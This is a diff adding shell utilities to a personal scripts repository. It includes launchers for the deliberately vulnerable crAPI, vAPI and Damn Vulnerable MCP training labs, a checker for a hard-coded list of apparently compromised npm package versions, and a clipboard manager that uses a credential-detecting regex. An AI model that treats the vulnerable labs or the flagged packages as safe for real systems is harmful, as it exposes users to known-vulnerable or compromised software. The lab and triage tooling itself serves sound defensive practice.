||||
echo "Install: sudo apt install docker.io docker-compose"
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
# Setup lab directories
|
||||
setup_lab() {
|
||||
echo -e "${CYAN}[*]${NC} Setting up API testing lab..."
|
||||
|
||||
mkdir -p "$LAB_DIR"
|
||||
|
||||
# crAPI
|
||||
if [[ ! -d "$CRAPI_DIR" ]]; then
|
||||
echo -e "${YELLOW}[*]${NC} Setting up crAPI..."
|
||||
mkdir -p "$CRAPI_DIR"
|
||||
cd "$CRAPI_DIR"
|
||||
curl -o docker-compose.yml https://raw.githubusercontent.com/OWASP/crAPI/main/deploy/docker/docker-compose.yml
|
||||
sudo docker-compose pull
|
||||
echo -e "${GREEN}✓${NC} crAPI setup complete"
|
||||
else
|
||||
echo -e "${GREEN}✓${NC} crAPI already exists"
|
||||
fi
|
||||
|
||||
# vAPI
|
||||
if [[ ! -d "$VAPI_DIR" ]]; then
|
||||
echo -e "${YELLOW}[*]${NC} Setting up vAPI..."
|
||||
cd "$LAB_DIR"
|
||||
git clone https://github.com/roottusk/vapi.git
|
||||
cd "$VAPI_DIR"
|
||||
sudo docker-compose pull
|
||||
echo -e "${GREEN}✓${NC} vAPI setup complete"
|
||||
else
|
||||
echo -e "${GREEN}✓${NC} vAPI already exists"
|
||||
fi
|
||||
|
||||
echo
|
||||
echo -e "${GREEN}✓${NC} Lab setup complete!"
|
||||
echo -e "${CYAN}[*]${NC} Run: ${BOLD}api-lab start${NC} to launch"
|
||||
}
|
||||
|
||||
# Start containers
|
||||
start_lab() {
|
||||
local app="${1:-both}"
|
||||
|
||||
case "$app" in
|
||||
crapi)
|
||||
if [[ ! -d "$CRAPI_DIR" ]]; then
|
||||
echo -e "${RED}Error:${NC} crAPI not set up. Run: api-lab setup"
|
||||
exit 1
|
||||
fi
|
||||
echo -e "${CYAN}[*]${NC} Starting crAPI..."
|
||||
cd "$CRAPI_DIR"
|
||||
sudo docker-compose -f docker-compose.yml --compatibility up -d
|
||||
echo -e "${GREEN}✓${NC} crAPI started"
|
||||
echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://127.0.0.1:8888${NC}"
|
||||
echo -e "${CYAN}[*]${NC} Mailhog at: ${BOLD}http://127.0.0.1:8025${NC}"
|
||||
;;
|
||||
|
||||
vapi)
|
||||
if [[ ! -d "$VAPI_DIR" ]]; then
|
||||
echo -e "${RED}Error:${NC} vAPI not set up. Run: api-lab setup"
|
||||
exit 1
|
||||
fi
|
||||
echo -e "${CYAN}[*]${NC} Starting vAPI..."
|
||||
cd "$VAPI_DIR"
|
||||
sudo docker-compose up -d
|
||||
echo -e "${GREEN}✓${NC} vAPI started"
|
||||
echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://127.0.0.1/vapi${NC}"
|
||||
;;
|
||||
|
||||
both|all)
|
||||
start_lab crapi
|
||||
echo
|
||||
start_lab vapi
|
||||
;;
|
||||
|
||||
*)
|
||||
echo -e "${RED}Error:${NC} Unknown app: $app"
|
||||
echo "Valid options: crapi, vapi, both"
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
}
|
||||
|
||||
# Stop containers
|
||||
stop_lab() {
|
||||
local app="${1:-both}"
|
||||
|
||||
case "$app" in
|
||||
crapi)
|
||||
if [[ -d "$CRAPI_DIR" ]]; then
|
||||
echo -e "${CYAN}[*]${NC} Stopping crAPI..."
|
||||
cd "$CRAPI_DIR"
|
||||
sudo docker-compose stop
|
||||
echo -e "${GREEN}✓${NC} crAPI stopped"
|
||||
fi
|
||||
;;
|
||||
|
||||
vapi)
|
||||
if [[ -d "$VAPI_DIR" ]]; then
|
||||
echo -e "${CYAN}[*]${NC} Stopping vAPI..."
|
||||
cd "$VAPI_DIR"
|
||||
sudo docker-compose stop
|
||||
echo -e "${GREEN}✓${NC} vAPI stopped"
|
||||
fi
|
||||
;;
|
||||
|
||||
both|all)
|
||||
stop_lab crapi
|
||||
stop_lab vapi
|
||||
;;
|
||||
|
||||
*)
|
||||
echo -e "${RED}Error:${NC} Unknown app: $app"
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
}
|
||||
|
||||
# Show status
|
||||
show_status() {
|
||||
echo -e "${BOLD}${CYAN}API Lab Status:${NC}"
|
||||
echo
|
||||
sudo docker ps --format "table {{.Names}}\t{{.Status}}\t{{.Ports}}" | grep -E "(NAMES|crapi|vapi)" || echo "No lab containers running"
|
||||
}
|
||||
|
||||
# Show logs
|
||||
show_logs() {
|
||||
local app="${1:-}"
|
||||
|
||||
if [[ -z "$app" ]]; then
|
||||
echo -e "${RED}Error:${NC} Specify app: crapi or vapi"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
case "$app" in
|
||||
crapi)
|
||||
cd "$CRAPI_DIR"
|
||||
sudo docker-compose logs -f
|
||||
;;
|
||||
vapi)
|
||||
cd "$VAPI_DIR"
|
||||
sudo docker-compose logs -f
|
||||
;;
|
||||
*)
|
||||
echo -e "${RED}Error:${NC} Unknown app: $app"
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
}
|
||||
|
||||
# Main
|
||||
check_docker
|
||||
|
||||
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||
show_help
|
||||
exit 0
|
||||
fi
|
||||
|
||||
command="$1"
|
||||
shift
|
||||
|
||||
case "$command" in
|
||||
setup|install)
|
||||
setup_lab
|
||||
;;
|
||||
start|up)
|
||||
start_lab "${1:-both}"
|
||||
;;
|
||||
stop|down)
|
||||
stop_lab "${1:-both}"
|
||||
;;
|
||||
status|ps)
|
||||
show_status
|
||||
;;
|
||||
logs)
|
||||
show_logs "${1:-}"
|
||||
;;
|
||||
*)
|
||||
echo -e "${RED}Error:${NC} Unknown command: $command"
|
||||
echo "Run 'api-lab --help' for usage"
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
22
scripts/apply-gpu-fix.sh
Executable file
22
scripts/apply-gpu-fix.sh
Executable file
|
|
@ -0,0 +1,22 @@
|
|||
#!/bin/bash
# Apply AMD GPU power management fix for Pop!_OS 22.04.
# Writes a modprobe config disabling aggressive power management for the
# AMD Phoenix GPU, then rebuilds the initramfs. Requires sudo; reboot after.
set -euo pipefail

CONF=/etc/modprobe.d/amdgpu.conf

echo "Creating AMD GPU configuration..."
# Quoted heredoc: content is literal. sudo tee writes the root-owned file
# without spawning a root shell.
sudo tee "$CONF" > /dev/null << 'EOFINNER'
# Disable aggressive power management for AMD Phoenix GPU
# Temporary fix until Pop!_OS 24.04 stable (Dec 11, 2025)
options amdgpu ppfeaturemask=0x0
options amdgpu dpm=0
EOFINNER

echo ""
echo "Verifying configuration was created..."
cat "$CONF"

echo ""
echo "Rebuilding initramfs..."
# Critical step: with set -e a failure here aborts before claiming success.
sudo update-initramfs -u

echo ""
echo "✅ Fix applied! Please reboot now:"
echo "   sudo reboot"
||||
37
scripts/catbin
Executable file
37
scripts/catbin
Executable file
|
|
@ -0,0 +1,37 @@
|
|||
#!/usr/bin/env bash
set -euo pipefail

# Script Name: catbin
# Description: Display source code of executables in PATH (security auditing!)
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
# Credit: Evan Hahn - https://codeberg.org/EvanHahn/dotfiles
# Usage:  catbin httpstatus   # see what the httpstatus script does
#         catbin tryna        # audit the tryna script
#         catbin ls           # won't work for binaries, only scripts

if [[ $# -eq 0 ]]; then
    {
        echo "Usage: catbin <command-name>"
        echo "Example: catbin httpstatus"
    } >&2
    exit 1
fi

# Resolve the command on PATH; empty string when not found.
target=$(command -v "$1" 2>/dev/null || true)

if [[ -z "$target" ]]; then
    echo "Command not found: $1" >&2
    exit 1
fi

# Only text files (scripts) can be displayed; refuse compiled binaries.
if ! file "$target" | grep -q "text"; then
    echo "Error: $target is a binary, not a script" >&2
    echo "File type: $(file "$target")" >&2
    exit 1
fi

# Prefer bat for syntax highlighting when it is installed.
if command -v bat &>/dev/null; then
    bat "$target"
else
    cat "$target"
fi
56
scripts/check-npm-cache.sh
Executable file
56
scripts/check-npm-cache.sh
Executable file
|
|
@ -0,0 +1,56 @@
|
|||
#!/usr/bin/env bash
# Check whether any of a fixed list of npm package@version pairs is present
# in the local npm cache (supply-chain incident triage helper).
set -euo pipefail

packages_json='[
  {"name":"backslash","version":"0.2.1"},
  {"name":"chalk-template","version":"1.1.1"},
  {"name":"supports-hyperlinks","version":"4.1.1"},
  {"name":"has-ansi","version":"6.0.1"},
  {"name":"simple-swizzle","version":"0.2.3"},
  {"name":"color-string","version":"2.1.1"},
  {"name":"error-ex","version":"1.3.3"},
  {"name":"color-name","version":"2.0.1"},
  {"name":"is-arrayish","version":"0.3.3"},
  {"name":"slice-ansi","version":"7.1.1"},
  {"name":"color-convert","version":"3.1.1"},
  {"name":"wrap-ansi","version":"9.0.1"},
  {"name":"ansi-regex","version":"6.2.1"},
  {"name":"supports-color","version":"10.2.1"},
  {"name":"strip-ansi","version":"7.1.1"},
  {"name":"chalk","version":"5.6.1"},
  {"name":"debug","version":"4.4.2"},
  {"name":"ansi-styles","version":"6.2.2"},
  {"name":"proto-tinker-wc","version":"0.1.87"},
  {"name":"duckdb","version":"1.3.3"},
  {"name":"@duckdb/node-api","version":"1.3.3"},
  {"name":"@duckdb/node-bindings","version":"1.3.3"}
]'

if ! command -v jq >/dev/null 2>&1; then
    echo "Error: 'jq' is required (to parse the JSON array-of-objects)."
    exit 1
fi

# Collect package names into an array (safe even if a name ever contained
# shell metacharacters) for a single 'npm cache ls' invocation.
mapfile -t names < <(jq -r '.[].name' <<<"$packages_json")

echo "Running 'npm cache ls' for given packages..."
npm_output="$(npm cache ls "${names[@]}" 2>/dev/null || true)"

echo
echo "Packages found in npm cache:"
found=0
# Process substitution keeps the loop in the current shell, so 'found'
# survives (the old tmpfile workaround is no longer needed).
while IFS=$'\t' read -r name version; do
    # grep -F: names/versions contain '.' and '/', which are regex
    # metacharacters; match them literally to avoid false positives.
    if [[ -n "$name" ]] && grep -qF -- "${name}-${version}" <<<"$npm_output"; then
        echo "• $name@$version"
        found=1
    fi
done < <(jq -r '.[] | "\(.name)\t\(.version)"' <<<"$packages_json")

if [[ $found -eq 0 ]]; then
    echo "(none)"
fi
18
scripts/cht.sh
Executable file
18
scripts/cht.sh
Executable file
|
|
@ -0,0 +1,18 @@
|
|||
#!/bin/bash
# Primagean cht.sh
# tmux + cht.sh + fzf: pick a language or core util, enter a query, and open
# the cheat-sheet result in a new tmux window.
set -euo pipefail

languages="golang lua cpp c typescript nodejs"
core_utils="xargs find mv sed awk"

# One candidate per line for fzf; word-splitting of the lists is intentional.
# shellcheck disable=SC2086
selected=$(printf '%s\n' $languages $core_utils | fzf) || exit 0
read -rp "query: " query

# BUG FIX: the old 'printf $languages | grep -qs $selected' only ever printed
# the first word ("golang"), so every other language was misrouted to the
# core-util URL form. Match the selection against the full list, exactly.
# shellcheck disable=SC2086
if printf '%s\n' $languages | grep -qxF -- "$selected"; then
    # Language queries use /<lang>/<query> with spaces encoded as '+'.
    query_plus=$(printf '%s' "$query" | tr ' ' '+')
    tmux neww bash -c "curl cht.sh/$selected/$query_plus & while [ : ]; do sleep 1; done"
else
    # Core utils use the <tool>~<query> form.
    tmux neww bash -c "curl cht.sh/$selected~$query & while [ : ]; do sleep 1; done"
fi
528
scripts/clip
Executable file
528
scripts/clip
Executable file
|
|
@ -0,0 +1,528 @@
|
|||
#!/usr/bin/env bash
set -euo pipefail

# Script Name: clip
# Description: Smart clipboard manager with history, search, and categories
# Usage:  clip                 # Show history with fzf search
#         clip pin             # Pin current clipboard item
#         clip cat 5           # Show 5th history item
#         clip search "192"    # Search history
#         clip clear           # Clear history

# Tool configuration: state lives under ~/.clipboard.
VERSION="1.0.0"
CLIP_DIR="$HOME/.clipboard"
HISTORY_FILE="$CLIP_DIR/history.txt"
PINS_FILE="$CLIP_DIR/pins.txt"
MAX_HISTORY=100

# ANSI color palette for terminal output.
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly BLUE='\033[0;34m'
readonly RED='\033[0;31m'
readonly CYAN='\033[0;36m'
readonly MAGENTA='\033[0;35m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'
||||
# Create the on-disk state (~/.clipboard with history + pins files) on first run.
init_clip() {
    [[ -d "$CLIP_DIR" ]] && return 0
    mkdir -p "$CLIP_DIR"
    touch "$HISTORY_FILE" "$PINS_FILE"
}
||||
|
||||
# Print full usage: commands, examples, feature notes and file locations.
show_help() {
    printf '%b\n' "${BOLD}clip${NC} - Smart Clipboard Manager v${VERSION}"
    printf '\n'
    printf '%b\n' "${BOLD}USAGE:${NC}"
    printf '%s\n' " clip [COMMAND]"
    printf '\n'
    printf '%b\n' "${BOLD}COMMANDS:${NC}"
    printf '%b\n' " ${CYAN}(no args)${NC} Show history with fzf search"
    printf '%b\n' " ${CYAN}pin${NC} Pin current clipboard item"
    printf '%b\n' " ${CYAN}pins${NC} Show pinned items"
    printf '%b\n' " ${CYAN}cat N${NC} Show Nth history item"
    printf '%b\n' " ${CYAN}search TERM${NC} Search history"
    printf '%b\n' " ${CYAN}list${NC} List recent history (last 20)"
    printf '%b\n' " ${CYAN}save${NC} Save current clipboard to history"
    printf '%b\n' " ${CYAN}clear${NC} Clear history"
    printf '%b\n' " ${CYAN}delete N${NC} Delete Nth history item"
    printf '%b\n' " ${CYAN}unpin N${NC} Delete Nth pinned item"
    printf '%b\n' " ${CYAN}stats${NC} Show statistics"
    printf '%b\n' " ${CYAN}-h, --help${NC} Show this help"
    printf '\n'
    printf '%b\n' "${BOLD}EXAMPLES:${NC}"
    printf '%s\n' " clip # Interactive search"
    printf '%s\n' " clip pin # Pin important item"
    printf '%s\n' " clip search \"192.168\" # Find IP addresses"
    printf '%s\n' " clip cat 1 # Show most recent"
    printf '%s\n' " clip delete 5 # Delete 5th item from history"
    printf '%s\n' " clip unpin 1 # Delete 1st pinned item"
    printf '\n'
    printf '%b\n' "${BOLD}FEATURES:${NC}"
    printf '%s\n' " - Automatic history (monitors clipboard)"
    printf '%s\n' " - Pattern detection (URLs, IPs, hashes)"
    printf '%s\n' " - Security: Auto-expire sensitive data"
    printf '%s\n' " - Pin important items"
    printf '%s\n' " - fzf integration for search"
    printf '\n'
    printf '%b\n' "${BOLD}NOTES:${NC}"
    printf '%s\n' " History: $HISTORY_FILE"
    printf '%s\n' " Pins: $PINS_FILE"
    printf '%s\n' " Max history: $MAX_HISTORY items"
}
||||
|
||||
# Classify clipboard content and print one of:
#   url | ip | hash | code | credential | text
# Check order matters: e.g. code containing "password" classifies as "code".
detect_type() {
    local data="$1"

    # URL
    if [[ "$data" =~ ^https?:// ]]; then
        echo "url"
        return
    fi
    # IPv4 prefix
    if [[ "$data" =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} ]]; then
        echo "ip"
        return
    fi
    # Hex digest: MD5 (32), SHA-1 (40) or SHA-256 (64) chars.
    if [[ "$data" =~ ^[a-f0-9]{32}$ ]] || [[ "$data" =~ ^[a-f0-9]{40}$ ]] || [[ "$data" =~ ^[a-f0-9]{64}$ ]]; then
        echo "hash"
        return
    fi
    # Common source-code markers.
    if [[ "$data" =~ (function|const|var|class|def|import|export) ]]; then
        echo "code"
        return
    fi
    # Credential-looking content (callers refuse to persist these).
    if [[ "$data" =~ (password|secret|token|key|bearer|api[_-]?key) ]]; then
        echo "credential"
        return
    fi
    echo "text"
}
||||
|
||||
# Append clipboard content to the history log.
# Skips credential-like content, empty strings and consecutive duplicates;
# trims the log to the newest MAX_HISTORY entries.
save_to_history() {
    local content="$1"
    local kind
    kind=$(detect_type "$content")

    # Never persist anything that looks like a secret.
    if [[ "$kind" == "credential" ]]; then
        echo -e "${YELLOW}⚠${NC} Sensitive data detected - not saved to history" >&2
        return 0
    fi

    # Nothing to record.
    [[ -n "$content" ]] || return 0

    # Skip if identical to the newest entry (fields 3+ hold the content,
    # which may itself contain '|').
    if [[ -f "$HISTORY_FILE" ]]; then
        local newest
        newest=$(tail -1 "$HISTORY_FILE" | cut -d'|' -f3-)
        [[ "$newest" == "$content" ]] && return 0
    fi

    # Record as: timestamp|type|content
    echo "$(date '+%Y-%m-%d %H:%M:%S')|$kind|$content" >> "$HISTORY_FILE"

    # Keep only the newest MAX_HISTORY lines.
    if [[ $(wc -l < "$HISTORY_FILE") -gt $MAX_HISTORY ]]; then
        tail -n $MAX_HISTORY "$HISTORY_FILE" > "$HISTORY_FILE.tmp"
        mv "$HISTORY_FILE.tmp" "$HISTORY_FILE"
    fi
}
||||
|
||||
# Print the X11 clipboard contents using whichever helper is installed.
get_clipboard() {
    if command -v xsel &>/dev/null; then
        xsel --output --clipboard
        return
    fi
    if command -v xclip &>/dev/null; then
        xclip -selection clipboard -o
        return
    fi
    echo "Error: No clipboard tool found" >&2
    return 1
}
||||
|
||||
# Write $1 to the X11 clipboard (no trailing newline added).
set_clipboard() {
    if command -v xsel &>/dev/null; then
        echo -n "$1" | xsel --input --clipboard
        return
    fi
    if command -v xclip &>/dev/null; then
        echo -n "$1" | xclip -selection clipboard
        return
    fi
    echo "Error: No clipboard tool found" >&2
    return 1
}
||||
|
||||
# Interactive history browser: pick an entry via fzf and copy it to the
# clipboard. Requires fzf; exits 0 quietly when there is no history yet.
show_history_fzf() {
    # fzf is a hard requirement for the interactive view.
    if ! command -v fzf &>/dev/null; then
        echo -e "${RED}Error:${NC} fzf not found" >&2
        echo "Install it with: sudo apt install fzf" >&2
        exit 1
    fi

    if [[ ! -f "$HISTORY_FILE" ]] || [[ ! -s "$HISTORY_FILE" ]]; then
        echo -e "${YELLOW}No history yet${NC}" >&2
        exit 0
    fi

    # Newest-first listing: tac reverses the append-only log, then awk
    # renders "index | time | [type] | preview" rows. Content may itself
    # contain '|', so fields 4..NF are re-joined before truncation.
    selected=$(tac "$HISTORY_FILE" | awk -F'|' '
    {
        idx = NR
        time = $1
        type = $2
        content = $3
        for (i=4; i<=NF; i++) content = content "|" $i

        # Truncate preview
        preview = content
        if (length(preview) > 60) {
            preview = substr(preview, 1, 60) "..."
        }

        printf "%3d | %s | %-10s | %s\n", idx, time, "[" type "]", preview
    }
    ' | fzf --height=60% --layout=reverse \
        --header="Select item to copy (ESC to cancel)" \
        --preview='echo {}' \
        --preview-window=up:3:wrap)

    if [[ -n "$selected" ]]; then
        # Extract the full content: the first fzf column is the 1-based index
        # into the REVERSED file, so re-reverse and take that line.
        index=$(echo "$selected" | awk '{print $1}')
        full_content=$(tac "$HISTORY_FILE" | sed -n "${index}p" | cut -d'|' -f3-)

        # Copy to clipboard
        set_clipboard "$full_content"
        echo -e "${GREEN}✓${NC} Copied to clipboard"
    fi
}
||||
|
||||
# Append the current clipboard contents to the pins file as
# "timestamp|type|content". Fails when the clipboard is empty.
pin_item() {
    local content
    content=$(get_clipboard)

    if [[ -z "$content" ]]; then
        echo -e "${RED}Error:${NC} Clipboard is empty" >&2
        exit 1
    fi

    local kind stamp
    kind=$(detect_type "$content")
    stamp=$(date '+%Y-%m-%d %H:%M:%S')

    echo "$stamp|$kind|$content" >> "$PINS_FILE"
    echo -e "${GREEN}✓${NC} Pinned item (type: $kind)"
}
||||
|
||||
# Show pinned items: interactive fzf picker (copies the selection to the
# clipboard) when fzf is installed, otherwise a plain numbered listing.
show_pins() {
    if [[ ! -f "$PINS_FILE" ]] || [[ ! -s "$PINS_FILE" ]]; then
        echo -e "${YELLOW}No pinned items${NC}"
        exit 0
    fi

    echo -e "${BOLD}${CYAN}Pinned Items:${NC}"
    echo

    if command -v fzf &>/dev/null; then
        # Interactive selection
        # awk renders "index | time | [type] | preview"; the content may
        # contain '|', so fields 4..NF are re-joined before truncation.
        selected=$(cat "$PINS_FILE" | awk -F'|' '
        {
            idx = NR
            time = $1
            type = $2
            content = $3
            for (i=4; i<=NF; i++) content = content "|" $i

            preview = content
            if (length(preview) > 60) {
                preview = substr(preview, 1, 60) "..."
            }

            printf "%3d | %s | %-10s | %s\n", idx, time, "[" type "]", preview
        }
        ' | fzf --height=60% --layout=reverse \
            --header="Select pinned item to copy (ESC to cancel)" \
            --preview='echo {}')

        if [[ -n "$selected" ]]; then
            # First fzf column is the 1-based line number in the pins file
            # (pins are NOT reversed, unlike history).
            index=$(echo "$selected" | awk '{print $1}')
            full_content=$(sed -n "${index}p" "$PINS_FILE" | cut -d'|' -f3-)
            set_clipboard "$full_content"
            echo -e "${GREEN}✓${NC} Copied pinned item to clipboard"
        fi
    else
        # Just list them
        cat "$PINS_FILE" | awk -F'|' '
        {
            idx = NR
            time = $1
            type = $2
            content = $3
            for (i=4; i<=NF; i++) content = content "|" $i

            preview = content
            if (length(preview) > 60) {
                preview = substr(preview, 1, 60) "..."
            }

            printf "%3d | %s | %-10s | %s\n", idx, time, "[" type "]", preview
        }
        '
    fi
}
||||
|
||||
# Print the raw content of the Nth most-recent history entry ($1 = N).
show_item() {
    local n=$1
    local content

    if [[ ! -f "$HISTORY_FILE" ]]; then
        echo -e "${RED}Error:${NC} No history" >&2
        exit 1
    fi

    # History is appended oldest-first; tac makes index 1 the newest.
    content=$(tac "$HISTORY_FILE" | sed -n "${n}p" | cut -d'|' -f3-)

    if [[ -z "$content" ]]; then
        echo -e "${RED}Error:${NC} No item at index $n" >&2
        exit 1
    fi

    echo "$content"
}
||||
|
||||
# Case-insensitive substring search over the raw history log; prints matching
# rows as "time | [type] | preview".
search_history() {
    local needle="$1"

    if [[ ! -f "$HISTORY_FILE" ]]; then
        echo -e "${RED}Error:${NC} No history" >&2
        exit 1
    fi

    echo -e "${BOLD}${CYAN}Search results for: ${needle}${NC}"
    echo

    # awk re-joins fields 4..NF since content may contain '|', then truncates.
    grep -i "$needle" "$HISTORY_FILE" | awk -F'|' '
    {
        time = $1
        type = $2
        content = $3
        for (i=4; i<=NF; i++) content = content "|" $i

        preview = content
        if (length(preview) > 60) {
            preview = substr(preview, 1, 60) "..."
        }

        printf "%s | %-10s | %s\n", time, "[" type "]", preview
    }
    '
}
||||
|
||||
# Print the 20 newest history entries, newest first, as numbered rows.
list_recent() {
    if [[ ! -f "$HISTORY_FILE" ]]; then
        echo -e "${YELLOW}No history${NC}"
        exit 0
    fi

    echo -e "${BOLD}${CYAN}Recent Clipboard History (last 20):${NC}"
    echo

    # tail+tac: newest 20, most recent at the top; awk re-joins content
    # fields (they may contain '|') and truncates the preview.
    tail -20 "$HISTORY_FILE" | tac | awk -F'|' '
    {
        idx = NR
        time = $1
        type = $2
        content = $3
        for (i=4; i<=NF; i++) content = content "|" $i

        preview = content
        if (length(preview) > 60) {
            preview = substr(preview, 1, 60) "..."
        }

        printf "%3d | %s | %-10s | %s\n", idx, time, "[" type "]", preview
    }
    '
}
||||
|
||||
# Summarize history size, pin count and a per-type breakdown.
show_stats() {
    if [[ ! -f "$HISTORY_FILE" ]]; then
        echo -e "${YELLOW}No history${NC}"
        exit 0
    fi

    local total pins
    total=$(wc -l < "$HISTORY_FILE")
    # Falls back to 0 when the pins file is missing.
    pins=$(wc -l < "$PINS_FILE" 2>/dev/null || echo 0)

    echo -e "${BOLD}${CYAN}Clipboard Statistics:${NC}"
    echo
    echo " Total items: $total"
    echo " Pinned items: $pins"
    echo " Max history: $MAX_HISTORY"
    echo

    echo -e "${BOLD}${CYAN}By Type:${NC}"
    # Count field 2 (type) occurrences, most common first.
    awk -F'|' '{print $2}' "$HISTORY_FILE" | sort | uniq -c | sort -rn | awk '
    {printf " %-15s %d\n", $2, $1}'
}
||||
|
||||
# Delete the Nth most-recent history entry ($1 = N) after a y/N confirmation.
delete_item() {
    local n=$1
    local total content preview answer

    if [[ ! -f "$HISTORY_FILE" ]]; then
        echo -e "${RED}Error:${NC} No history" >&2
        exit 1
    fi

    total=$(wc -l < "$HISTORY_FILE")
    if [[ $n -lt 1 ]] || [[ $n -gt $total ]]; then
        echo -e "${RED}Error:${NC} Invalid index (1-$total)" >&2
        exit 1
    fi

    # Preview what would be removed (indices count from the newest entry).
    content=$(tac "$HISTORY_FILE" | sed -n "${n}p" | cut -d'|' -f3-)
    preview="${content:0:60}"
    if [[ ${#content} -gt 60 ]]; then
        preview="${preview}..."
    fi

    echo -e "${YELLOW}Delete item $n:${NC} $preview"
    echo -n "Continue? (y/N) "
    read -r answer

    if [[ "$answer" =~ ^[Yy]$ ]]; then
        # The file is oldest-first; translate the newest-first index.
        sed -i "$((total - n + 1))d" "$HISTORY_FILE"
        echo -e "${GREEN}✓${NC} Deleted item $n"
    else
        echo "Cancelled"
    fi
}
||||
|
||||
# Remove the Nth pinned item ($1 = N, 1-based file order) after confirmation.
delete_pin() {
    local n=$1
    local total content preview answer

    if [[ ! -f "$PINS_FILE" ]] || [[ ! -s "$PINS_FILE" ]]; then
        echo -e "${YELLOW}No pinned items${NC}"
        exit 0
    fi

    total=$(wc -l < "$PINS_FILE")
    if [[ $n -lt 1 ]] || [[ $n -gt $total ]]; then
        echo -e "${RED}Error:${NC} Invalid index (1-$total)" >&2
        exit 1
    fi

    # Preview what would be removed (pins are in plain file order).
    content=$(sed -n "${n}p" "$PINS_FILE" | cut -d'|' -f3-)
    preview="${content:0:60}"
    if [[ ${#content} -gt 60 ]]; then
        preview="${preview}..."
    fi

    echo -e "${YELLOW}Unpin item $n:${NC} $preview"
    echo -n "Continue? (y/N) "
    read -r answer

    if [[ "$answer" =~ ^[Yy]$ ]]; then
        sed -i "${n}d" "$PINS_FILE"
        echo -e "${GREEN}✓${NC} Unpinned item $n"
    else
        echo "Cancelled"
    fi
}
||||
|
||||
# Truncate the history file after a y/N confirmation (pins are untouched).
clear_history() {
    local answer
    echo -n "Clear clipboard history? (y/N) "
    read -r answer
    if [[ "$answer" =~ ^[Yy]$ ]]; then
        : > "$HISTORY_FILE"
        echo -e "${GREEN}✓${NC} History cleared"
    else
        echo "Cancelled"
    fi
}
||||
|
||||
# --- Entry point ---------------------------------------------------------
init_clip

# No arguments: drop straight into the interactive fzf browser.
if [[ $# -eq 0 ]]; then
    show_history_fzf
    exit 0
fi

case $1 in
    -h|--help|help)
        show_help
        ;;
    save)
        content=$(get_clipboard)
        save_to_history "$content"
        echo -e "${GREEN}✓${NC} Saved to history"
        ;;
    pin)
        pin_item
        ;;
    pins)
        show_pins
        ;;
    cat)
        if [[ $# -lt 2 ]]; then
            echo -e "${RED}Error:${NC} Item index required" >&2
            exit 1
        fi
        show_item "$2"
        ;;
    search|s)
        if [[ $# -lt 2 ]]; then
            echo -e "${RED}Error:${NC} Search query required" >&2
            exit 1
        fi
        shift
        search_history "$*"
        ;;
    list|ls|l)
        list_recent
        ;;
    delete|del|rm)
        if [[ $# -lt 2 ]]; then
            echo -e "${RED}Error:${NC} Item index required" >&2
            exit 1
        fi
        delete_item "$2"
        ;;
    unpin)
        if [[ $# -lt 2 ]]; then
            echo -e "${RED}Error:${NC} Item index required" >&2
            exit 1
        fi
        delete_pin "$2"
        ;;
    clear)
        clear_history
        ;;
    stats)
        show_stats
        ;;
    *)
        echo -e "${RED}Error:${NC} Unknown command: $1" >&2
        echo "Run 'clip --help' for usage" >&2
        exit 1
        ;;
esac
34
scripts/common_ports.py
Normal file
34
scripts/common_ports.py
Normal file
|
|
@ -0,0 +1,34 @@
|
|||
# Well-known port numbers mapped to their conventional service names.
# Keys are TCP/UDP port ints; values are lowercase service labels.
ports_and_services = {
    # File transfer / remote shells
    20: "ftp-data",
    21: "ftp",
    22: "ssh",
    23: "telnet",
    # Mail
    25: "smtp",
    # Name / address services
    53: "dns",
    67: "dhcp",
    68: "dhcp",
    69: "tftp",
    # Web
    80: "http",
    # Mail retrieval / time
    110: "pop3",
    123: "ntp",
    # NetBIOS / IMAP / SNMP / routing
    137: "netbios-ns",
    138: "netbios-dgm",
    139: "netbios-ssn",
    143: "imap",
    161: "snmp",
    162: "snmp-trap",
    179: "bgp",
    # Secure web / Windows shares / secure mail
    443: "https",
    445: "microsoft-ds",
    465: "smtps",
    # Logging / mail submission / printing
    514: "syslog",
    587: "submission",
    631: "ipp",
    # Secure mail retrieval
    993: "imaps",
    995: "pop3s",
    # Databases / remote desktop
    3306: "mysql",
    3389: "rdp",
    5432: "postgresql",
    5900: "vnc",
    8080: "http-proxy",
}
397
scripts/dvmcp
Executable file
397
scripts/dvmcp
Executable file
|
|
@ -0,0 +1,397 @@
|
|||
#!/usr/bin/env bash
set -euo pipefail

# Script Name: dvmcp
# Description: Damn Vulnerable MCP Server launcher
# Usage: dvmcp start|stop|status|logs|build

VERSION="1.1.0"

# ANSI color palette
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly CYAN='\033[0;36m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'

# Docker container settings
CONTAINER_NAME="dvmcp"
IMAGE="dvmcp:latest"
PORT_RANGE="9001-9010"

# Claude Code config juggling: the production settings file is backed up and
# replaced with a CTF-only config while the lab runs; the state file marks
# that the swap is active.
SETTINGS_DIR="${HOME}/.claude"
PROD_CONFIG="${SETTINGS_DIR}/settings.json"
CTF_CONFIG="${SETTINGS_DIR}/settings-ctf.json"
BACKUP_CONFIG="${SETTINGS_DIR}/settings-prod-backup.json"
CONFIG_STATE_FILE="${SETTINGS_DIR}/.dvmcp-config-state"
|
||||
# Print full usage: commands, examples, access info and the config-isolation
# story for first-time users.
show_help() {
    printf '%b\n' "${BOLD}dvmcp${NC} - Damn Vulnerable MCP Server Launcher v${VERSION}"
    printf '\n'
    printf '%b\n' "${BOLD}USAGE:${NC}"
    printf '%s\n' " dvmcp <command>"
    printf '\n'
    printf '%b\n' "${BOLD}COMMANDS:${NC}"
    printf '%b\n' " ${CYAN}build${NC} Build Docker image from Dockerfile"
